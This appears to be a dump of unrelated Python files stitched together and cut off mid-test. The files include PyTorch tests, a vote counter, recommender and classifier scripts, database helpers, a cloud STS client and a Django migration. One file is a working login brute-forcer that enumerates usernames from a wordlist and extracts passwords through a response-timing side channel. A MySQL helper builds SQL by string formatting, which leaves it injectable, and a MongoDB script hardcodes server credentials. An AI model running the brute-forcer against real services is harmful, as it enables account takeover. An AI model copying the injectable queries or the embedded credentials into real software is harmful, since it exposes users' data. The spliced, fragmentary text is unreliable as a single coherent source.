layers.append(nn.Linear(params[-3], params[-2], bias=True))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.Linear(params[-2], params[-1], bias=True))
mlp = nn.Sequential(*layers)
self.mlp = nn.Sequential(SequenceWise(mlp))
else:
if self.batch_norm:
self.batch_norm = nn.BatchNorm1d(params[0])
for i in range(1, len(params) - 1):
layers.append(nn.Linear(params[i - 1], params[i], bias=True))
layers.append(nn.ReLU(inplace=True))
layers.append(nn.Linear(params[-2], params[-1], bias=True))
self.mlp = nn.Sequential(*layers)
def forward(self, x):
if self.wantLSTM:
x = self.rnn(x)
if self.batch_norm:
x = self.batch_norm(x)
out = self.mlp(x)
out = out.squeeze()
return out
import torch
from torch.nn import MSELoss, ReLU
from _paritybench_helpers import _mock_config, _mock_layer, _paritybench_base, _fails_compile
TESTCASES = [
# (nn.Module, init_args, forward_args, jit_compiles)
(AttentivePooling,
lambda: ([], {'dim1': 4, 'dim2': 4}),
lambda: ([torch.rand([4, 4, 4])], {}),
True),
(BasicBlock,
lambda: ([], {'inplanes': 4, 'planes': 4}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
True),
(BatchRNN,
lambda: ([], {'input_size': 4, 'hidden_size': 4}),
lambda: ([torch.rand([4, 4])], {}),
True),
(ConvNormPool,
lambda: ([], {'input_size': 4, 'hidden_size': 4, 'kernel_size': 4}),
lambda: ([torch.rand([4, 4, 4])], {}),
True),
(DocEncoder,
lambda: ([], {}),
lambda: ([torch.rand([4, 300, 300])], {}),
False),
(Embedding,
lambda: ([], {'vocab_size': 4, 'embedding_size': 4}),
lambda: ([torch.rand([4, 4, 4, 4]), 0], {}),
True),
(GRU2,
lambda: ([], {'input_size': 4, 'hidden_size': 4, 'input_bias': 4, 'hidden_bias': 4}),
lambda: ([torch.rand([4, 4, 4])], {}),
False),
(GroupNorm2d,
lambda: ([], {'num_features': 4}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
False),
(GroupNorm3d,
lambda: ([], {'num_features': 4}),
lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
False),
(SequenceWise,
lambda: ([], {'module': _mock_layer()}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
True),
(SwapTrailingAxes,
lambda: ([], {}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
True),
(Swish,
lambda: ([], {}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
True),
(TimeDistributed,
lambda: ([], {'module': _mock_layer()}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
True),
(VecTail,
lambda: ([], {'n': 4}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
True),
(_GroupNorm,
lambda: ([], {'num_features': 4}),
lambda: ([torch.rand([4, 4, 4, 4])], {}),
False),
]
class Test_microsoft_msrflute(_paritybench_base):
def test_000(self):
self._check(*TESTCASES[0])
def test_001(self):
self._check(*TESTCASES[1])
def test_002(self):
self._check(*TESTCASES[2])
def test_003(self):
self._check(*TESTCASES[3])
def test_004(self):
self._check(*TESTCASES[4])
def test_005(self):
self._check(*TESTCASES[5])
def test_006(self):
self._check(*TESTCASES[6])
def test_007(self):
self._check(*TESTCASES[7])
def test_008(self):
self._check(*TESTCASES[8])
def test_009(self):
self._check(*TESTCASES[9])
def test_010(self):
self._check(*TESTCASES[10])
def test_011(self):
self._check(*TESTCASES[11])
def test_012(self):
self._check(*TESTCASES[12])
def test_013(self):
self._check(*TESTCASES[13])
def test_014(self):
self._check(*TESTCASES[14])
|
#Ejercicio: Las Elecciones
# El programa primero recibe un número N , la cantidad de votos totales que se realizaron. Luego recibe N votos en formato string, cada uno consiste en el nombre del candidato seleccionado. El programa debe calcular el ganador e imprimir su nombre, para este ejemplo se asume que no hay empates. Los nombres y la cantidad de candidatos es desconocida.
cantidadVotos = int(input(""))
candidatos = {}
for voto in range(cantidadVotos):
candidato = input("")
if candidato in candidatos:
candidatos[candidato] += 1
else:
candidatos[candidato] = 1
candidatoElegido = ""
votos = 0
for candidato, voto in candidatos.items():
if(voto > votos):
candidatoElegido = candidato
votos = voto
print(candidatoElegido)
|
import sys
import socket
from itertools import product
import json
from string import ascii_letters, digits
import datetime
with open(r"C:\Users\javie\Downloads\logins.txt") as f:
logins = f.readlines()
logins = [x.strip() for x in logins]
ip_address = sys.argv[1]
port = int(sys.argv[2])
my_socket = socket.socket()
my_socket.connect((ip_address, port))
login = {'login': '', 'password': ' '}
for w in logins:
stop = False
w1 = [[character.lower(), character.upper()] for character in w]
for c in product(*w1):
login['login'] = ''.join(c)
json_login = json.dumps(login)
my_socket.send(json_login.encode())
response = my_socket.recv(1024)
response = response.decode('utf-8')
json_response = json.loads(response)
if json_response['result'] == 'Wrong password!':
with open(r"C:\Users\javie\Downloads\login_success.txt", 'a') as f:
f.write(''.join(c))
stop = True
break
else:
with open(r"C:\Users\javie\Downloads\login_fail.txt", 'a') as f:
f.write(''.join(c) + '\n')
if stop:
break
all_chr = ascii_letters + digits
password = ''
no_stop = True
while no_stop:
for chr in all_chr:
new_pass = password + chr
login['password'] = new_pass
json_login = json.dumps(login)
my_socket.send(json_login.encode())
time_1 = datetime.datetime.now()
response = my_socket.recv(1024)
time_2 = datetime.datetime.now()
difference = time_2 - time_1
response = response.decode('utf-8')
json_response = json.loads(response)
if difference.total_seconds() >= 0.1:
password = new_pass
break
elif json_response['result'] == "Connection success!":
print(json.dumps(login))
no_stop = False
break
my_socket.close()
|
# coding:utf-8
# File Name: plus_test
# Description :
# Author : micro
# Date: 2019/12/12
a_tuple = ("microease")
b_tuple = 24
c_tuple = a_tuple + str(b_tuple)
print(c_tuple)
|
from sklearn.utils import shuffle
def get_best_tokens_dummy(corpus, each_q):
pos = corpus[corpus['rate'] == 'positive']['content'].str.split(expand=True).stack().value_counts()
neg = corpus[corpus['rate'] == 'negative']['content'].str.split(expand=True).stack().value_counts()
best_tokens = pos.head(each_q) \
.add(neg.head(each_q), fill_value=0)
return best_tokens |
# -*- coding: utf-8 -*-
from mongoengine import *
from models.agent_model import Agent
# connect(db='sd',
# host='10.3.242.253',
# port=27017,
# username='sd',
# password='software_design'
# )
connect('software_db', host='localhost', port=27017)
class Task(Document):
"""Saving and reading data with mongoDB.
"""
name = StringField(required=True)
task_type = StringField(required=True)
destination = StringField(required=True)
interval = StringField(required=True)
agents = ListField(required=True)
spec = ListField(required=True)
@classmethod
def get_all_task(cls):
"""Get all task from mongodb
Arguments:
None
Returns:
objs: an object of mongoengine
"""
objs = cls.objects
return objs
@classmethod
def create_task(cls, name, task_type, destination, interval, agents):
"""create task from frontend
Arguments:
name: a str of task name
task_type: a str of task type
destination: a str of url
interval: a str of number represents time
agents: a list of avialiable agents
Returns:
obj: an object of mongoengine
"""
obj = cls(name=name, task_type=task_type, destination=destination, interval=interval, agents=agents).save()
# Update agent state for task
for agent in agents:
agent.update(state='on')
return obj
# @classmethod
# def get_task_data(cls, task_id):
@classmethod
def get_agents_with_id(cls, task_id):
"""Get agents id according to task id for frontend display
"""
obj = cls.objects(id=task_id).first()
return obj.agents
@classmethod
def get_task_with_id(cls, task_id):
"""Get tasks id according to task id for frontend display
"""
obj = cls.objects(id=task_id).first()
return obj
# 结束任务,并重置探针数据
@classmethod
def end_task(cls, task_id):
"""
"""
agents = cls.get_agents_with_id(task_id)
for agent in agents:
agent.update(state='off')
agent.update(delay=[])
agent.update(shake=[])
agent.update(packet_loss=[])
obj = cls.objects(id=task_id).first()
obj.delete()
return
if __name__ == '__main__':
# local test
# connect('software_db', host='localhost', port=27017)
# server test zzy
connect(db='sd',
host='10.3.242.253',
port=27017,
username='sd',
password='software_design'
)
data = []
agents = Agent.get_all_agent()
for agent in agents:
if agent.mac == '222':
data.append(agent)
task1 = Task.create_task(name='task2',task_type='ping',destination='www.baidu.com',interval='5',agents=data)
task = Task.get_all_task().first()
print(task.id)
agents = Task.get_agents_with_id(task.id)
print(agents[0].state)
print(agents[0].packet_loss)
task = Task.get_all_task().first()
Task.end_task(task.id)
|
import numpy as np
import scipy.sparse as sps
from collections import namedtuple
from sklearn.model_selection import KFold, ParameterGrid
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.linear_model import ElasticNet, Ridge, Lasso
from sklearn.base import BaseEstimator
import time
import pandas as pd
import sys
sys.path.append('./../')
import utils.utils as ut
from TopPopular.TopPopular import TopPop
from Item_fSLIM import ItemfSLIM as IfSL
from Item_SCM import Item_SCM as ISC
def cv_search(rec, urm_expl, urm_impl, icm, non_active_items_mask, sample_size, filename):
np.random.seed(1)
perm = np.random.permutation(urm_expl.shape[0])[:sample_size]
icm_sample = icm
non_active_items_mask_sample = non_active_items_mask
urm_sample = urm_impl[perm]
params = {'alpha_ridge':[9500, 9750, 10000, 25000, 50000, 75000, 100000], 'k_nn':[30000],
'similarity':['CB'], 'aa_sh':[2000]}
grid = list(ParameterGrid(params))
folds = 4
kfold = KFold(n_splits=folds)
splits = [(train, test) for train,test in kfold.split(urm_sample)]
retained_ratings_perc = 0.75
n = 5
result = namedtuple('result', ['mean_score', 'std_dev', 'parameters'])
results = []
total = float(reduce(lambda acc, x: acc * len(x), params.itervalues(), 1) * folds)
prog = 1.0
for pars in grid:
print pars
rec = rec.set_params(**pars)
maps = []
for row_train, row_test in splits:
urm_train = urm_sample[row_train,:]
rec.fit(urm_train, icm_sample)
urm_test = urm_expl[perm][row_test,:]
hidden_ratings = []
for u in range(urm_test.shape[0]):
relevant_u = urm_test[u,].nonzero()[1] # Indices of rated items for test user u
if len(relevant_u) > 1:#1 or 2
np.random.shuffle(relevant_u)
urm_test[u, relevant_u[int(len(relevant_u) * retained_ratings_perc):]] = 0
hidden_ratings.append(relevant_u[int(len(relevant_u) * retained_ratings_perc):])
else:
hidden_ratings.append([])
maps.append(ut.map_scorer(rec, urm_test, hidden_ratings, n, non_active_items_mask_sample)) # Assume rec to predict indices of items, NOT ids
print "Progress: {:.2f}%".format((prog * 100) / total)
prog += 1
break
print maps
results.append(result(np.mean(maps), np.std(maps), pars))
print "Result: ", result(np.mean(maps), np.std(maps), pars)
scores = pd.DataFrame(data=[[_.mean_score, _.std_dev] + _.parameters.values() for _ in results],
columns=["MAP", "Std"] + _.parameters.keys())
print "Total scores: ", scores
scores.to_csv(filename+'.csv', sep='\t', index=False)
def produce_enriched_urm(rec, icm, urm_original_fit, urm_original_pred, n_predictions, non_active_items_mask, load_matrix, filename):
if load_matrix:
rec.W_sparse = ut.load_sparse_matrix(filename, 'csc', np.float32)
else:
rec.fit(urm_original_fit, icm)
ut.save_sparse_matrix(rec.W_sparse, filename)
ranks = rec.predict(urm_original_pred, n_predictions, non_active_items_mask)
ranks = np.array(ranks).flatten()
data = np.ones(ranks.shape[0])
cols = ranks.copy()
rows = np.repeat(range(urm_original_fit.shape[0]),n_predictions)
urm_enriched = sps.csr_matrix((data, (rows,cols)), urm_original_fit.shape)
urm_enriched[urm_original_fit != 0] = 1
return urm_enriched
def main():
urm_explicit = ut.read_interactions()
urm_implicit = urm_explicit.copy()
urm_implicit[urm_explicit > 0] = 1
items_dataframe = ut.read_items()
icm = ut.generate_icm(items_dataframe)
icm = ut.normalize_matrix(icm, row_wise=True)
item_ids = items_dataframe.id.values
actives = np.array(items_dataframe.active_during_test.values)
non_active_items_mask = actives == 0
test_users_idx = pd.read_csv('../../inputs/target_users_idx.csv')['user_idx'].values
urm_pred = urm_explicit[test_users_idx, :]
top_rec = TopPop(count=True)
top_rec.fit(urm_implicit)
top_pops = top_rec.top_pop[non_active_items_mask[top_rec.top_pop] == False]
fslim = IfSL.fSLIM_recommender(top_pops=top_pops, pred_batch_size=1000, sim_partition_size=1000, k_nn=30000,
similarity='CB', aa_sh=2000, alpha_ridge=100000)
urm_enriched = produce_enriched_urm(fslim, icm, urm_implicit, urm_explicit, 2, non_active_items_mask, True, "fSLIM 30000knn 100000alpha 2000sh CBsim ratings1")
# ----------------------------- SECOND PHASE ---------------------------------
fslim = IfSL.fSLIM_recommender(top_pops=top_pops, pred_batch_size=1000, sim_partition_size=1000, k_nn=30000,
similarity='CB', aa_sh=2000)
#cv_search(fslim, urm_expl=urm_explicit, urm_impl=urm_enriched, icm=icm, non_active_items_mask=non_active_items_mask,
# sample_size=10000, filename='fSLIM (Ridge) CV MAP values enriched phase 2')
# TODO: select best alpha
fslim = IfSL.fSLIM_recommender(top_pops=top_pops, pred_batch_size=1000, sim_partition_size=1000, k_nn=30000,
similarity='CB', aa_sh=2000, alpha_ridge=100000)
urm_enriched = produce_enriched_urm(fslim, icm, urm_enriched, urm_explicit, 2, non_active_items_mask, False,
"fSLIM 30000knn 100000alpha 2000sh CBsim ratings1+2 enriched phase 2")
# ----------------------------- THIRD PHASE ---------------------------------
fslim = IfSL.fSLIM_recommender(top_pops=top_pops, pred_batch_size=1000, sim_partition_size=1000, k_nn=30000,
similarity='CB', aa_sh=2000)
#cv_search(fslim, urm_expl=urm_explicit, urm_impl=urm_enriched, icm=icm, non_active_items_mask=non_active_items_mask,
# sample_size=10000, filename='fSLIM (Ridge) CV MAP values enriched phase 3')
# TODO: select best alpha
fslim = IfSL.fSLIM_recommender(top_pops=top_pops, pred_batch_size=1000, sim_partition_size=1000, k_nn=30000,
similarity='CB', aa_sh=2000, alpha_ridge=100000)
urm_enriched = produce_enriched_urm(fslim, icm, urm_enriched, urm_explicit, 1, non_active_items_mask, False,
"fSLIM 30000knn 100000alpha 2000sh CBsim ratings1+4 enriched phase 3")
# ----------------------------- FOURTH PHASE ---------------------------------
fslim = IfSL.fSLIM_recommender(top_pops=top_pops, pred_batch_size=1000, sim_partition_size=1000, k_nn=30000,
similarity='CB', aa_sh=2000)
# cv_search(fslim, urm_expl=urm_explicit, urm_impl=urm_enriched, icm=icm, non_active_items_mask=non_active_items_mask,
# sample_size=10000, filename='fSLIM (Ridge) CV MAP values enriched phase 4 (final)')
# TODO: select best alpha
fslim = IfSL.fSLIM_recommender(top_pops=top_pops, pred_batch_size=1000, sim_partition_size=1000, k_nn=30000,
similarity='CB', aa_sh=2000, alpha_ridge=100000)
fslim.fit(urm_enriched, icm)
ut.save_sparse_matrix(fslim.W_sparse, "fSLIM 30000knn 100000alpha 2000sh CBsim ratings1+5 enriched phase 4")
ranks = fslim.predict(urm_pred, 5, non_active_items_mask)
ut.write_recommendations("HybridPipeline fSLIM 30000k 100000alpha 2000sh implrating CBsim x4", ranks, test_users_idx, item_ids)
'''scm = ISC.Item_SCM(top_pops=top_pops, pred_batch_size=1000, C_SVM=0.01)
# scm.fit(urm_enriched)
# save_sparse_matrix(scm.W_sparse, "SCM SVM enriched 1minus2C ratings1")
scm.W_sparse = load_sparse_matrix("SCM SVM enriched 1minus2C ratings1", 'csc', np.float32)
ranking_scm = scm.predict(urm_implicit[test_users_idx,:], 5, non_active_items_mask)
ut.write_recommendations("HybridPipeline fSLIM 30000k 100000alpha 2000sh implrating CBsim SCM SVM 1minus2 impllpred", ranking_scm, test_users_idx, item_ids)
# fslim.fit(urm_enriched, icm)
# save_sparse_matrix(fslim.W_sparse, "fSLIM 30000knn 100000alpha 2000sh CBsim ratings1 enriched")
fslim.W_sparse = load_sparse_matrix("fSLIM 30000knn 100000alpha 2000sh CBsim ratings1 enriched", 'csc', np.float64)
ranking_fslim_enriched = fslim.predict(urm_pred, 5, non_active_items_mask)
ut.write_recommendations("HybridPipeline fSLIM 30000k 100000alpha 2000sh implrating CBsim x2", ranking_fslim_enriched, test_users_idx, item_ids)'''
main() |
import numpy as np
from sknn.mlp import Classifier, Layer
from sknn.platform import gpu32
import sys
import logging
import pickle
import argparse
from sklearn.grid_search import GridSearchCV
from sklearn.metrics import classification_report
import matplotlib.pyplot as plt
import csv
parser = argparse.ArgumentParser(description='Train network.')
parser.add_argument('action', metavar='N', type=str,
help='[train, predict]')
parser.add_argument('--loadfile', dest='loadfile', action='store',
type=str,
help='pkl file to load.')
args = parser.parse_args()
class_mapper = {'irish': 0, 'mexican': 1, 'chinese': 2,
'filipino': 3, 'vietnamese': 4, 'spanish': 13, 'japanese': 7,
'moroccan': 5, 'french': 12, 'greek': 9, 'indian': 10,
'jamaican': 11, 'british': 8, 'brazilian': 6, 'russian':
14, 'cajun_creole': 15, 'thai': 16, 'southern_us': 17,
'korean': 18, 'italian': 19}
#reverse mapping from string to int
class_mapper = dict(zip(class_mapper.values(), class_mapper.keys()))
def main():
NUMPY_INPUT_FILE_TEST = 'nn_test.npy'
NUMPY_INPUT_FILE = 'nn_train_39774.npy'
#NUMPY_INPUT_FILE = 'nn_train_140000.npy'
logging.basicConfig(
format="%(message)s",
level=logging.DEBUG,
stream=sys.stdout)
data = np.load(NUMPY_INPUT_FILE)
data_test = np.load(NUMPY_INPUT_FILE_TEST)
print "Total Train Samples %d" % len(data.transpose())
print "Total Test Samples %d" % len(data_test.transpose())
uid, y_train, X_train = data[
0,:].transpose(), data[1,:].transpose(), data[2:,:].transpose()
uid_test, X_test = data_test[
0,:].transpose(), data_test[1:,:].transpose()
train_index = int(X_train.shape[0] * .8)
print "Using %d samples to train" % train_index
# X_train, y_train, X_valid, y_valid = X_train[:train_index],
# y_train[:train_index], X_train[train_index:], y_train[train_index:]
# The most basic method of hyper paramater search
# learning reate, batch size
nn = Classifier(
layers=[
Layer("Maxout", units=450, pieces=2), # ,dropout=.1),
# Layer("Tanh",units=300),#,dropout=.1),
Layer("Softmax")],
learning_rate=0.1,
# weight_decay=.0001,
dropout_rate=.05,
# random_state= ,
learning_momentum=.5,
valid_size=.2,
batch_size=100,
n_stable=5,
f_stable=.001,
# valid_set=(X_valid,y_valid),
n_iter=60)
if args.loadfile:
gs = pickle.load(open(args.loadfile, 'rb'))
else:
gs = GridSearchCV(nn, cv=3, scoring='accuracy', param_grid={
'hidden0__units': [450,600],
#'hidden0__units': [150,300,450],
'hidden0__type': ["Maxout"],
'hidden0__pieces': [2],
'learning_rate': [0.05],
'batch_size': [100],
'dropout_rate': [.05]})
if args.action == 'train':
try:
gs.fit(X_train, y_train)
#nn.fit(X_train, y_train)
print gs.grid_scores_
print gs.best_score_
print gs.best_params_
nn_filename = 'nnout/nn_%s.pkl' % 1001
gs_filename = 'nnout/gs_%s.pkl' % 1001
pickle.dump(nn, open(gs_filename, 'wb'))
pickle.dump(gs, open(nn_filename, 'wb'))
print "Saving %s" % nn_filename
print "Saving %s" % gs_filename
except KeyboardInterrupt:
pickle.dump(gs, open('gs_temp.pkl', 'wb'))
pickle.dump(nn, open('nnout/nn_%s.pkl' % 'trained', 'wb'))
pass
elif args.action == 'predict':
y_pred = gs.predict(X_test)
y_pred_mapped = [class_mapper[y] for y in y_pred.flat]
results = np.append([uid_test.astype(str)], [y_pred_mapped], axis=0)
print "Saving test.csv"
np.savetxt("test.csv", results.transpose(), "%s,%s", header="id,cuisine")
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
import MySQLdb
class PyMysql:
conn = None
cur = None
def __init__(self, host='localhost', user='root', passwd='root',
db='bprest', port=3306):
self.host = host
self.user = user
self.passwd = passwd
self.db = db
self.port = port
def __open(self):
try:
self.conn = MySQLdb.connect(db=self.db, user=self.user,
passwd=self.passwd,
host=self.host, port=self.port)
self.cur = self.conn.cursor()
except MySQLdb.Error as e:
print "Error %d: %s" % (e.args[0], e.args[1])
def __close(self):
self.cur.close()
self.conn.close()
"""
about blueprint
"""
def mysql_insert_one_blueprint(self, name, components, rolename, content):
self.__open()
self.cur.execute("INSERT INTO blueprint (name, components, rolename, content) VALUES ('%s', '%s', '%s', '%s')" % (name, components, rolename, content))
rowid = self.conn.insert_id()
self.conn.commit()
self.__close()
return {"result": rowid}
def mysql_search_blueprint(self):
fields = ["id", "name", "content", "rolename", "components", "release_file", "release_time"]
result = []
sql = "SELECT " + ', '.join(fields) + " FROM blueprint;"
self.__open()
self.cur.execute(sql)
rows = self.cur.fetchall()
if rows:
for line in rows:
t = dict(zip(tuple(fields), line))
result.append(t)
self.__close()
return {"result": result}
def mysql_search_one_blueprint(self, id):
t = {}
fields = ["id", "name", "components", "rolename", "content", "release_file", "release_time"]
sql = "SELECT " + ', '.join(fields) + " FROM blueprint WHERE id=%s;" % id
self.__open()
rows = self.cur.execute(sql)
if rows == 0:
return {"result": t}
row = self.cur.fetchone()
if row:
t = dict(zip(tuple(fields), row))
self.__close()
return {"result": t}
def mysql_check_blueprint_byname(self, name):
t = 0
sql = "SELECT * FROM blueprint WHERE name='%s';" % name
self.__open()
rows = self.cur.execute(sql)
if rows > 0:
t = 1
self.__close()
return {"result": t}
def mysql_delete_one_blueprint(self, id):
sql = "DELETE FROM blueprint WHERE id=%s;" % id
self.__open()
self.cur.execute(sql)
self.conn.commit()
self.__close()
return {"result": id}
def mysql_update_one_blueprint(self, id, name, components, rolename, content):
self.__open()
self.cur.execute(("UPDATE blueprint SET name='%s', components='%s', rolename='%s', content='%s' WHERE id=%s") %
(name, components, rolename, MySQLdb.escape_string(content), id))
self.conn.commit()
self.__close()
return {"result": id}
def mysql_release_one_blueprint(self, id, release_file, release_time):
self.__open()
if release_time and release_file:
sql = ("UPDATE blueprint SET release_file='%s', release_time='%s' WHERE id=%s") % (release_file, release_time, id)
else:
sql = ("UPDATE blueprint SET release_file=Null, release_time=Null WHERE id=%s") % id
self.cur.execute(sql)
self.conn.commit()
self.__close()
return id
"""
about hostmapping
"""
def mysql_insert_one_hostmapping(self, rolename, content):
self.__open()
self.cur.execute("INSERT INTO hostmapping (rolename, content) VALUES ('%s', '%s')" % (rolename, content))
rowid = self.conn.insert_id()
self.conn.commit()
self.__close()
return {"result": rowid}
def mysql_search_hostmapping(self):
fields = ["id", "rolename", "content", "release_file", "release_time"]
result = []
sql = "SELECT " + ', '.join(fields) + " FROM hostmapping;"
self.__open()
self.cur.execute(sql)
rows = self.cur.fetchall()
if rows:
for line in rows:
t = dict(zip(tuple(fields), line))
result.append(t)
self.__close()
return {"result": result}
def mysql_search_one_hostmapping(self, id):
t = {}
fields = ["id", "rolename", "content", "release_file", "release_time"]
sql = "SELECT " + ', '.join(fields) + " FROM hostmapping WHERE id=%s;" % id
self.__open()
rows = self.cur.execute(sql)
if rows == 0:
return {"result": t}
row = self.cur.fetchone()
if row:
t = dict(zip(tuple(fields), row))
self.__close()
return {"result": t}
def mysql_check_hostmapping_byname(self, name):
t = 0
sql = "SELECT * FROM hostmapping WHERE rolename='%s';" % name
self.__open()
rows = self.cur.execute(sql)
if rows > 0:
t = 1
self.__close()
return {"result": t}
def mysql_delete_one_hostmapping(self, id):
sql = "DELETE FROM hostmapping WHERE id=%s;" % id
self.__open()
self.cur.execute(sql)
self.conn.commit()
self.__close()
return {"result": id}
def mysql_update_one_hostmapping(self, id, rolename, content):
self.__open()
self.cur.execute(("UPDATE hostmapping SET rolename='%s', content='%s' WHERE id=%s") %
(rolename, MySQLdb.escape_string(content), id))
self.conn.commit()
self.__close()
return {"result": id}
def mysql_release_one_hostmapping(self, id, release_file, release_time):
self.__open()
if release_time and release_file:
sql = ("UPDATE hostmapping SET release_file='%s', release_time='%s' WHERE id=%s") % (release_file, release_time, id)
else:
sql = ("UPDATE hostmapping SET release_file=Null, release_time=Null WHERE id=%s") % id
self.cur.execute(sql)
self.conn.commit()
self.__close()
return id
|
""" Code is generated by ucloud-model, DO NOT EDIT IT. """
import typing
from ucloud.core.client import Client
from ucloud.services.sts.schemas import apis
class STSClient(Client):
def __init__(
self, config: dict, transport=None, middleware=None, logger=None
):
super(STSClient, self).__init__(config, transport, middleware, logger)
def assume_role(self, req: typing.Optional[dict] = None, **kwargs) -> dict:
"""AssumeRole - 获取扮演角色的临时身份凭证
**Request**
- **RoleSessionName** (str) - (Required) 角色会话名称。
- **RoleUrn** (str) - (Required) 要扮演的RAM角色URN。
- **DurationSeconds** (int) - Token有效期。
- **Policy** (str) - 为STS Token额外添加的一个权限策略,进一步限制STS Token的权限。
**Response**
- **Credentials** (dict) - 见 **Credentials** 模型定义
**Response Model**
**Credentials**
- **AccessKeyId** (str) - 密钥ID。
- **AccessKeySecret** (str) - 密钥Secret。
- **Expiration** (str) - Token到期失效时间(UTC时间)。
- **SecurityToken** (str) - 安全令牌。
"""
# build request
d = {}
req and d.update(req)
d = apis.AssumeRoleRequestSchema().dumps(d)
resp = self.invoke("AssumeRole", d, **kwargs)
return apis.AssumeRoleResponseSchema().loads(resp)
|
# Generated by Django 2.1.3 on 2018-11-30 03:32
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AirPlane',
fields=[
('Airline', models.CharField(max_length=30)),
('AirPlane_code', models.CharField(max_length=20, primary_key=True, serialize=False, unique=True)),
('Num_of_seat', models.IntegerField()),
('Made_by_Company', models.CharField(max_length=100)),
('Maintenance_Day', models.IntegerField()),
],
),
migrations.CreateModel(
name='AirPort',
fields=[
('Ap_Code', models.CharField(max_length=100, primary_key=True, serialize=False, unique=True)),
('Terminal', models.CharField(max_length=100)),
('Gate', models.CharField(max_length=100)),
('Status', models.CharField(max_length=100)),
('Airplain_code', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='airline_info.AirPlane')),
],
),
migrations.CreateModel(
name='Flight_captain',
fields=[
('First_name', models.CharField(max_length=100)),
('Second_name', models.CharField(max_length=100)),
('Birthday', models.DateField()),
('home_address', models.CharField(max_length=100)),
('ssn', models.IntegerField()),
('C_code', models.CharField(max_length=100, primary_key=True, serialize=False, unique=True)),
],
),
migrations.CreateModel(
name='From_to',
fields=[
('F_T_id', models.IntegerField(primary_key=True, serialize=False, unique=True)),
('Departure_loc', models.CharField(max_length=100)),
('Arrival_loc', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='Time_line',
fields=[
('T_id', models.IntegerField(primary_key=True, serialize=False, unique=True)),
('Departure_time', models.DateField()),
('Arrival_time', models.DateField()),
],
),
migrations.AddField(
model_name='airport',
name='FTID',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='airline_info.From_to'),
),
migrations.AddField(
model_name='airport',
name='TID',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='airline_info.Time_line'),
),
migrations.AddField(
model_name='airplane',
name='Captain_code',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='airline_info.Flight_captain'),
),
]
|
# -*- coding:utf-8 -*-
x = "abc"
if x == "abc":
print("x and abc 是相等的")
else:
print("x and abc 是不相等的")
|
import json
import requests
import herogetAgent
requests.packages.urllib3.disable_warnings()
def main():
# 访问百度验证
baidu = "https://www.sohu.com/"
use_ip_proxy = []
ip_proxy_path = "./jsonfile/proxyipdata3.json"
# 加载数据
ip_proxy_datas = json.load(open(ip_proxy_path,"r"))
# print(ip_proxy_datas)
# 遍历代理地址
try:
for ip_element in ip_proxy_datas:
# 验证,访问,设置访问超时
# print(http_element)
# print("开始验证 %s" % ip_element)
ip_response = requests.get(baidu,
headers=herogetAgent.get_header(),
proxies=ip_element,
verify=False
)
# time.sleep(2 + randint(1,4))
# print(ip_response.status_code)
if ip_response.status_code == 200:
print("--%s->ip地址请求成功" % ip_element)
use_ip_proxy.append(ip_element)
json.dump(use_ip_proxy,
open("./jsonfile/proxiespool2.json", "w"),
indent=2)
else:
# print("--%s->ip地址请求失败" % http_element)
continue
print("----------------------------->验证完成!!")
except Exception as e:
print(e)
if __name__ == '__main__':
main()
|
from django.urls import path
from . import views
from django.views.decorators.csrf import csrf_exempt
urlpatterns = [
path('filldata', views.FillData().as_view(), name = 'filldata'),
path('deldata', views.DelData().as_view(), name = 'deldata'),
path('getjson', views.GetJson().as_view(), name = 'getjson'),
] |
import os
import unittest
from parameterized import parameterized
from utils.emulator_launcher import CommandLineEmulatorLauncher
from utils.test_modes import TestModes
from utils.channel_access import ChannelAccess
from utils.ioc_launcher import get_default_ioc_dir, EPICS_TOP
from utils.testing import get_running_lewis_and_ioc, parameterized_list, skip_if_recsim
# Device prefix
DEVICE_PREFIX = "MEZFLIPR_01"
EMULATOR_NAME = "mezflipr"
IOCS = [
{
"name": DEVICE_PREFIX,
"directory": get_default_ioc_dir("MEZFLIPR"),
"emulator": EMULATOR_NAME,
"macros": {
"PROTOCOL_VERSION": "2"
}
},
]
TEST_MODES = [TestModes.RECSIM, TestModes.DEVSIM]
# Currently only one flipper but they may add more in a future iteration of the program
flipper = "FLIPPER"
class MezfliprTests(unittest.TestCase):
def setUp(self):
self._lewis, self._ioc = get_running_lewis_and_ioc(EMULATOR_NAME, DEVICE_PREFIX)
self.ca = ChannelAccess(device_prefix=DEVICE_PREFIX, default_timeout=30)
def test_WHEN_ioc_is_started_THEN_ioc_is_not_disabled(self):
self.ca.assert_that_pv_is("DISABLE", "COMMS ENABLED")
@parameterized.expand(parameterized_list(["On", "Off"]))
def test_GIVEN_power_is_set_THEN_can_be_read_back(self, _, state):
self.ca.assert_setting_setpoint_sets_readback(state, readback_pv="{}:POWER".format(flipper))
@parameterized.expand(parameterized_list([0., 0.12, 5000.5]))
def test_GIVEN_compensation_is_set_THEN_compensation_can_be_read_back(self, _, compensation):
self.ca.assert_setting_setpoint_sets_readback(compensation, readback_pv="{}:COMPENSATION".format(flipper))
def _assert_mode(self, mode):
self.ca.assert_that_pv_is("{}:MODE".format(flipper), mode)
self.ca.assert_that_pv_alarm_is("{}:MODE".format(flipper), self.ca.Alarms.NONE)
def _assert_params(self, param):
self.ca.assert_that_pv_value_causes_func_to_return_true("{}:PARAMS".format(flipper),
lambda val: val is not None and val.rstrip() == param)
self.ca.assert_that_pv_alarm_is("{}:PARAMS".format(flipper), self.ca.Alarms.NONE)
@skip_if_recsim("State of device not simulated in recsim")
def test_WHEN_constant_current_mode_set_THEN_parameters_reflected_and_mode_is_constant_current(self):
param = 25
